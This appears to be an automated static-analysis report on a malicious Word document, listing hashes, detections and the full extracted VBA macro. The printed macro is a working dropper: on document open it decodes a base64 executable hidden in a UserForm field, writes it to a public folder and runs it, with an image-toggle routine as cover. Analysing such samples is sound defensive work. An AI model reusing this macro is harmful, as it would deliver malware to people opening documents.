Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 bb1e8b207999c799…

MALICIOUS

Office (OLE) / .DOC

Size: 1.37 MB
Created: 2025-08-23 10:25:00
Authoring application: Microsoft Office Word
First seen: 2026-06-15
MD5: ebb181a5c54f3316869d878c932537d3
SHA-1: 74194db44ebf5c904d20ee46191fcb9507b46d99
SHA-256: bb1e8b207999c799f1044de8e945a7bfdac405bdda1a45e675480d52afd2438f
Risk score: 310

Heuristics (10)

  • ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPER
    The VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x41 bytes
    Disassembly hidden — these bytes score as data, not coherent x86 code (3/8 branch targets land on an instruction boundary (38% coherence)).
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5815 bytes
SHA-256: 8f927deadde23cbbed0efc452afd9e0e28aff84df1ada8b081539f981ca48624
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function CreateProcessA Lib "kernel32" ( _
    ByVal lpApplicationName As String, _
    ByVal lpCommandLine As String, _
    ByVal lpProcessAttributes As LongPtr, _
    ByVal lpThreadAttributes As LongPtr, _
    ByVal bInheritHandles As Long, _
    ByVal dwCreationFlags As Long, _
    ByVal lpEnvironment As LongPtr, _
    ByVal lpCurrentDirectory As String, _
    lpStartupInfo As Any, _
    lpProcessInformation As Any) As Long

Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
    ByVal hObject As LongPtr) As Long

Private Type STARTUPINFO
    cb As Long
    lpReserved As LongPtr
    lpDesktop As LongPtr
    lpTitle As LongPtr
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As LongPtr
    hStdInput As LongPtr
    hStdOutput As LongPtr
    hStdError As LongPtr
End Type

Private Type PROCESS_INFORMATION
    hProcess As LongPtr
    hThread As LongPtr
    dwProcessId As Long
    dwThreadId As Long
End Type

Function Base64Decode(ByVal base64String As String) As Byte()
    Dim xmlObj As Object
    Dim nodeObj As Object

    Set xmlObj = CreateObject("MSXML2.DOMDocument.6.0")
    Set nodeObj = xmlObj.createElement("b64")

    nodeObj.DataType = "bin.base64"
    nodeObj.Text = base64String

    Base64Decode = nodeObj.nodeTypedValue
End Function

Sub Run_e(ByVal exePath As String)
    On Error GoTo ErrorHandler

    Dim si As STARTUPINFO
    Dim pi As PROCESS_INFORMATION
    Dim ret As Long

    si.cb = LenB(si)

    ret = CreateProcessA(exePath, vbNullString, 0, 0, 0, 0, 0, vbNullString, si, pi)

    If ret <> 0 Then
        CloseHandle pi.hProcess
        CloseHandle pi.hThread
    Else
        MsgBox "Failed to start process: " & Err.Description
    End If

    Exit Sub

ErrorHandler:
    MsgBox "Error in Run_e: " & Err.Description
End Sub



Sub SmartToggle()
    On Error GoTo ErrorHandler
    
    Dim doc As Document
    Set doc = ActiveDocument
    
    Dim img1 As Shape, img2 As Shape
    Set img1 = doc.Shapes("FullImage1")
    Set img2 = doc.Shapes("FullImage2")
    

    If img1.AlternativeText = "Front" Then
        img1.WrapFormat.Type = wdWrapBehind
        img2.WrapFormat.Type = wdWrapFront
        img2.ZOrder msoBringToFront
        img1.AlternativeText = "Back"
        img2.AlternativeText = "Front"
    Else
        img2.WrapFormat.Type = wdWrapBehind
        img1.WrapFormat.Type = wdWrapFront
        img1.ZOrder msoBringToFront
        img1.AlternativeText = "Front"
        img2.AlternativeText = "Back"
    End If
    
    Exit Sub

ErrorHandler:
    MsgBox "Error: " & Err.Description
End Sub


Private Sub Document_Open()
    On Error GoTo ErrorHandler


    SmartToggle


    Dim pathh As String
    Dim appBytes() As Byte
    Dim fileNum As Integer

    pathh = "C:\Users\Public\ui.txt"

    
    appBytes = Base64Decode(UserForm1.bodf90.Text)

    fileNum = FreeFile
    Open pathh For Binary Access Write As #fileNum
    Put #fileNum, 1, appBytes
    Close #fileNum

    Run_e pathh

    Exit Sub

ErrorHandler:
    MsgBox "Error in Document_Open: " & Err.Description
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{919618CB-62F5-4C41-BE37-81DFF65F57CA}{1FFE6BE1-856B-429D-980A-A968B67887C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub bodf90_Change()

End Sub

Attribute VB_Name = "Module1"

Sub CreateFullPageImages_NoFade()
    On Error GoTo ErrorHandler
    
    Dim doc As Document
    Set doc = ActiveDocument
    
    ' Delete existing shapes
    Do While doc.Shapes.Count > 0
        doc.Shapes(1).Delete
    Loop
    
    ' Page dimensions
    Dim pageWidth As Single, pageHeight As Single
    pageWidth = doc.PageSetup.pageWidth
    pageHeight = doc.PageSetup.pageHeight
    
    ' Margin offsets
    Dim leftMargin As Single, topMargin As Single
    leftMargin = doc.PageSetup.leftMargin
    topMargin = doc.PageSetup.topMargin
    
    ' Add first image
    Dim img1 As Shape
    Set img1 = doc.Shapes.AddPicture( _
        FileName:="C:\Users\jojo\Desktop\im\Image1.jpg", _
        LinkToFile:=False, _
        SaveWithDocument:=True, _
        Left:=-leftMargin, _
        Top:=-topMargin, _
        Width:=pageWidth, _
        Height:=pageHeight)
    img1.LockAspectRatio = msoFalse
    img1.WrapFormat.Type = wdWrapBehind
    img1.Name = "FullImage1"
    img1.AlternativeText = "Back"
    
    ' Add second image
    Dim img2 As Shape
    Set img2 = doc.Shapes.AddPicture( _
        FileName:="C:\Users\jojo\Desktop\im\Image2.jpg", _
        LinkToFile:=False, _
        SaveWithDocument:=True, _
        Left:=-leftMargin, _
        Top:=-topMargin, _
        Width:=pageWidth, _
        Height:=pageHeight)
    img2.LockAspectRatio = msoFalse
    img2.WrapFormat.Type = wdWrapFront
    img2.Name = "FullImage2"
    img2.AlternativeText = "Front"
    
    img2.ZOrder msoBringToFront
    
    MsgBox "Images created and initialized!"
    
    Exit Sub

ErrorHandler:
    MsgBox "Error: " & Err.Description
End Sub
Filename: vba_embedded_payload.bin
Kind: vba-embedded-pe
Source: decoded from a hex/base64 payload string in a VBA UserForm control or macro literal
Size: 804352 bytes
SHA-256: 69c0c0d0cdfcebb698d952751f28f914a67f67a5e1bd81b4a1a4529ee7b78cbe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 shell/COM execution token(s).